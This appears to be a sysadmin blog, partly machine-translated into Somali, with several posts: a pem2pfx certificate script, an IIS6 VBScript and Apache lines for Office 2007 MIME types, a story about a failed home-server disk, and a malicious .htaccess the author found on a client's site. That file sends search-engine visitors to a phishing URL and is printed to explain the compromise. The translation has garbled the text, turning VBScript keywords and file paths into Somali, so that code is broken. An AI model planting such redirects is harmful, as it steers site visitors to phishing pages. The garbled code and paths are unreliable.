[wax ka beddel] Wax badan baa sidaas ah. Waxaa soo baxday in furanssl awood u leedahay in uu go'aamiyo in furaha iyo shahaadda ay horey ugu jiraan hal fayl. Sidaa darteed, maya kala qaybsanxoqid ayaa loo baahan yahay (iyo sidoo kale, Waxaan rajeynayaa in qof aqrinaya tan ugu yaraan uu wax ka bartay sida wanaagsan ee loo kala qaybsamo). Dhab ahaan, qoraalka oo dhan sidoo kale wuu duugoobi karaa… badargh. Waa hagaag, at least it gives a nice warning about not giving a blank passphrase. 😀

Here’s the new version:

pem2pfx – converts a .pem-formatted file containing a private key and signed certificate into a Windows-compatible .pfx certificate file.

#!/bin/bash
#pem2pfx
#v0.2
#Khiyaano badan - brendan@swiftspirit.co.za
# Converts a .pem certificate file to .pfx format
# $1 is the source file
set -e
 
if [ $# = 1 ]; then
  outputfile=`echo $1 | sed 's/.pem$/.pfx/'`
 
  echo "Please specify a password below. Windows refuses to import a .pfx certificate with a blank password."
  openssl pkcs12 -export -out $outputfile -in $1
 
 else
  echo "pem2pfx - converts a .pem formatted private-key and certificate file to an IIS-compatible .pfx file."
  echo "Usage: pem2pfx inputfile.pem"
fi

dheeraad ah…

Noocyada dukumiintiga ee cusub Xafiiska 2007 waxay siisay qaar ka mid ah martigaliyayaasha webka dhibaatooyin markay macaamiishooda rabaan inay siiyaan dukumiintiyo loogu soo dejisto. Inta badan, dukumintiyada waxaa bixiya adeegaha shabakada sida “qoraal / html” taas oo markaa loo bixiyo tan oo ah qashin shaashadda isticmaalaha websaydhka.

Habka ugu fiican ee tan lagu xallin karo waa in lagu daro dhammaan MIME noocyada qaabeynta ugu weyn ee serverka. IIS7 for Windows horeyba waxay u leeyihiin noocyadan MIME si sax ah ayaa loo dejiyay. IIS6 iyo IIS5 waxay u baahan yihiin noocyada MIME in lagu daro, sida laga yaabaa Apache rakibidda hore. Wixii Apache, sidoo kale waxaa jira shaqo ka shaqeysiin milkiilaha domain shaqsi ah inuu ku daro noocyada mime via Apache’s .htaccess faylka.

IIS 6 Nooca MIME ku darista (ee Maamulaha Server)

Kahor intaan tan la samayn, hubi in adeegahaaga sidoo kale loo dejiyay inuu u oggolaado sixitaanka metabase toos ah:

1. Xamuul Maamulaha IIS: Bilow -> Ra, “inetmgr” -> [OK]
2. Midig u guji “server” oo guji “Properties”
3. Gudaha “Adeegyada Macluumaadka Internetka” tab (badiyaa tabka keliya), hubi in “Enkartaan Direct Metabase Edit” sanduuqa ayaa la hubiyaa.
4. Click [OK]

Hubso inaad dib u habeynta IIS (here loogu talagalay IIS5) ka hor. Ma qaadi doono wax masuuliyad ah maamul jabinaya adeegeisa. Waxaan haystaa sabab aan ku rumaysto tan laga yaabaa sidoo kale ka shaqee IIS5 si kastaba ha ahaatee waxaan haystaa sabab aad u badan oo aan ku rumaysan karo inay khaladaad badan bixin karto. Haddii ay tahay IIS5 / Windows 2000 admin wuxuu diyaar u yahay inuu tan ii tijaabiyo ka dib markii aan taageeray qaabeyntaada fadlan ii soo sheeg natiijooyinka.

Nuqul qoraalka soo socda u gal feyl la yiraahdo msoff07-addmime.vbs oo fuliya mar ka amraya taliska adigoo garaacaya qoraal msoff07-addmime.vbs oo riixaya gala. Haddii aad maamusho wax ka badan hal jeer, noocyada MIME ayaa lagu dari doonaa wakhti kasta waxaadna lahaan doontaa qoraallo badan oo isku mid ah:

'Qoraalkani wuxuu ku darayaa Xafiiska lagama maarmaanka ah 2007 Noocyada MIME ee IIS 6 Server.
'Inaad adeegsato qoraalkan, kaliya laba-guji ama ka dhaqan khad amarka ah.
'Ku socodsiinta qoraalkan dhowr jeer waxay keeneysaa galitaanno badan oo ka mid ah
'IIS MimeMap marka waa inaadan socodsiin wax ka badan hal jeer.
'Waxaa laga beddelay http://msdn.microsoft.com/en-us/library/ms752346.aspx
 
Miisaan MimeMapObj, MimeMapArray, MimeTypesToAddArray, WshShell, oExec
Const ADS_PROPERTY_UPDATE = 2 
 
Calan noocyada MIME lagu daro
MimeTypesToAddArray = Diyaarin(".docm", "application/vnd.ms-word.document.macroEnabled.12", _
".docx", "application/vnd.openxmlformats-officedocument.wordprocessingml.document", _
".dotm", "application/vnd.ms-word.template.macroEnabled.12", _
".dotx", "application/vnd.openxmlformats-officedocument.wordprocessingml.template", _
".potm", "application/vnd.ms-powerpoint.template.macroEnabled.12", _
".potx", "application/vnd.openxmlformats-officedocument.presentationml.template", _
".ppam", "application/vnd.ms-powerpoint.addin.macroEnabled.12", _
".ppsm", "application/vnd.ms-powerpoint.slideshow.macroEnabled.12", _
".ppsx", "application/vnd.openxmlformats-officedocument.presentationml.slideshow", _
".pptm", "application/vnd.ms-powerpoint.presentation.macroEnabled.12", _
".pptx", "application/vnd.openxmlformats-officedocument.presentationml.presentation", _
".sldm", "application/vnd.ms-powerpoint.slide.macroEnabled.12", _
".sldx", "application/vnd.openxmlformats-officedocument.presentationml.slide", _
".xlam", "application/vnd.ms-excel.addin.macroEnabled.12", _
".xlsb", "application/vnd.ms-excel.sheet.binary.macroEnabled.12", _
".xlsm", "application/vnd.ms-excel.sheet.macroEnabled.12", _
".xlsx", "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", _
".xltm", "application/vnd.ms-excel.template.macroEnabled.12", _
".xltx", "application/vnd.openxmlformats-officedocument.spreadsheetml.template") 
 
Soo qaado shayga mimemap-ka
Deji MimeMapObj = GetObject("IIS://LocalHost / MimeMap")
 
'Wac AddMimeType nooc kasta oo kordhin ah / nooc MIME ah
Wixii miiska = 0 si ay u UBound(MimeTypesToAddArray) Tallaabada 2
    AddMimeType MimeTypesToAddArray(miiska), MimeTypesToAddArray(miiska+1)
Xiga
 
Abuur shey Shell
Deji WshShell = Abuuritaan("WScript.Shell")
 
'Jooji oo Bilow Adeegga IIS
Deji oExec = WshShell.Ful("net stop w3svc")
Samee Halka oExec.Xaaladda = 0
    WScript.Hurdo 100
Loop
 
Deji oExec = WshShell.Ful("net start w3svc")
Samee Halka oExec.Xaaladda = 0
    WScript.Hurdo 100
Loop
 
Deji oExec = Waxba
 
Xaaladda uga warbixi isticmaalaha
WScript.Echo "Microsoft Office 2007 Dukumentiyada noocyada MIME ayaa la diiwaangeliyey."
 
'AddMimeType Sub
Sub AddMimeType (Dheeraad ah, MType)
 
    'Khariidadaha ka soo qaado guriga MimeMap.
    MimeMapArray = MimeMapObj.GetEx("MimeMap") 
 
    'Ku dar khariidad cusub.
    i = UBound(MimeMapArray) + 1
    Redim Kaydso MimeMapArray(i)
    Deji MimeMapArray(i) = Abuuritaan("MimeMap")
    MimeMapArray(i).Kordhin = Dheeraad ah
    MimeMapArray(i).Nooca = MType
    MimeMapObj.PutEx ADS_PROPERTY_UPDATE, "MimeMap", MimeMapArray
    MimeMapObj.SetInfo
 
Dhammaad Sub

Apache MIME ku darista nooca (ee Maamulaha Server)

Apache waxay ku kaydisaa noocyadeeda MIME feyl caadi ahaan ku yaal $nooca loo yaqaan 'installpath / conf / mime.types. Eeg mod_mime dukumiinti wixii faahfaahin ah ee ku saabsan sida ay u shaqeyso. Arch Linux rakibto noocyadeeda MIME at /iwm / httpd / conf / mime.types iyo Isbarbar dhigga Plesk ku rakibto /usr / maxaliga / psa / admin / conf / mime.types. Waxaa laga yaabaa in qeybintaada ay ku hayso meel kale, markaa raadso noocyada faylka adoo ordaya hel noocyada mime.

Kudar khadadka soo socda feylkaaga mime.types:

application/vnd.ms-word.document.macroEnabled.12                          docm
application/vnd.openxmlformats-officedocument.wordprocessingml.document   docx
application/vnd.ms-word.template.macroEnabled.12                          dotm
application/vnd.openxmlformats-officedocument.wordprocessingml.template   dotx
application/vnd.ms-powerpoint.template.macroEnabled.12                    potm
application/vnd.openxmlformats-officedocument.presentationml.template     potx
application/vnd.ms-powerpoint.addin.macroEnabled.12                       ppam
application/vnd.ms-powerpoint.slideshow.macroEnabled.12                   ppsm
application/vnd.openxmlformats-officedocument.presentationml.slideshow    ppsx
application/vnd.ms-powerpoint.presentation.macroEnabled.12                pptm
application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
application/vnd.ms-powerpoint.slide.macroEnabled.12                       sldm
application/vnd.openxmlformats-officedocument.presentationml.slide        sldx
application/vnd.ms-excel.addin.macroEnabled.12                            xlam
application/vnd.ms-excel.sheet.binary.macroEnabled.12                     xlsb
application/vnd.ms-excel.sheet.macroEnabled.12                            xlsm
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet         xlsx
application/vnd.ms-excel.template.macroEnabled.12                         xltm
application/vnd.openxmlformats-officedocument.spreadsheetml.template      xltx

Apache MIME ku darista nooca (For the domain owner with at least FTP access – using .htaccess file)

Add the following text to your domain’s .htaccess faylka, most commonly in an httpdocs/ directory

AddType application/vnd.ms-word.document.macroEnabled.12 docm
AddType application/vnd.openxmlformats-officedocument.wordprocessingml.document docx
AddType application/vnd.ms-word.template.macroEnabled.12 dotm
AddType application/vnd.openxmlformats-officedocument.wordprocessingml.template dotx
AddType application/vnd.ms-powerpoint.template.macroEnabled.12 potm
AddType application/vnd.openxmlformats-officedocument.presentationml.template potx
AddType application/vnd.ms-powerpoint.addin.macroEnabled.12 ppam
AddType application/vnd.ms-powerpoint.slideshow.macroEnabled.12 ppsm
AddType application/vnd.openxmlformats-officedocument.presentationml.slideshow ppsx
AddType application/vnd.ms-powerpoint.presentation.macroEnabled.12 pptm
AddType application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
AddType application/vnd.ms-powerpoint.slide.macroEnabled.12 sldm
AddType application/vnd.openxmlformats-officedocument.presentationml.slide sldx
AddType application/vnd.ms-excel.addin.macroEnabled.12 xlam
AddType application/vnd.ms-excel.sheet.binary.macroEnabled.12 xlsb
AddType application/vnd.ms-excel.sheet.macroEnabled.12 xlsm
AddType application/vnd.openxmlformats-officedocument.spreadsheetml.sheet xlsx
AddType application/vnd.ms-excel.template.macroEnabled.12 xltm
AddType application/vnd.openxmlformats-officedocument.spreadsheetml.template xltx

Some of you may already know that I built a home server not too long ago. I documented some of the very important parts of how it was built though I was planning on releasing all the documentation all at once. I was using Arch Linux and I hadn’t nearly finished everything, especially the documentation. Tusaale ahaan, it was supposed to be a media server. After some disk shuffling, it was supposed to end up having a DUUL1 for the boot and RAID 10 for the rest (the media part).

This didn’t work out at all.

I got as far as having an efficient (iyo iyo sidoo kale–firewalled) routing gateway server. I was finally satisfied that the customised local routing* was working correctly and I was confident that my tests with DHCP meant I could disable the DHCP service on the flimsy ADSL router and have all my flatmates start using the server as the Internet albaabka. Instead: I was logged in to the server from the office, I’d just installed Apache2**, and I was about to consult with a colleague regarding getting nice graphs put together so the flatmates could all see who was using up the bandwidth*** — when I noticed a little message indicating that the root filesystem had been remounted read-only due to some or other disk failure.

And then I lost my connection to the server.

And then I gained a foul mood.

🙁

When I arrived home, I found that, as I had guessed from the descriptive message given at the office, the (aad) old 80GB IDE disk that I was using for the root filesystem had failed. Unfortunately, the server would never boot again and there was little chance of prying everything off onto another disk to continue where I’d left off.

I’m buying a replacement (SATA) HDD this next weekend just after pay day – and I’ve changed my mind about documenting my progress… and backing up my configurations:

Release Early. Release Often.

* ISPs in South Africa charge less (easy price comparison) for “local-only” (within South Africa) traffic on ADSL but only if you use an ADSL account that CANNOT access web services outside of South Africa. This means that if you want to take advantage of the reduced costs but still be able to access the Internet at large, you need to set up some sneaky routing.

** one-command-install: ~$ yaourt -S apache

*** Internet Access in SA is expensive – you get charged about R70 ($7 / £4.9 / €5.46) per GB when using ADSL, or about R2 per MB if using GPRS / 3G.

I very recently found a problem with a client’s web site due to a .htaccess faylka. The site was hosted on a Windows server running IIS using IISPassword, which makes use of .htaccess files for its settings.

IISPassword doesn’t follow exactly the same rules as with Apache however. If the .htaccess file exists then it must contain IISPassword-appropriate rules, otherwise the server returns only the following error:

Here’s the content of the .htaccess file. I’ve only modified the final redirection URL to point to example.com appropriately:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,L]

If this were on a server running Apache with mod_rewrite, most web users would go directly to the correct site content. Only if they reached the site through the search engines and indexes listed in the .htaccess, would they be redirected to the siffy phishing url that the cracker wants victims to reach.

Dabcan, the cracker (or perhaps even an automated worm) didn’t realise that the server in question didn’t even support these mod_rewrite rules. But either way, this is very worrying as I can foresee many arguments about whether or not the site is working…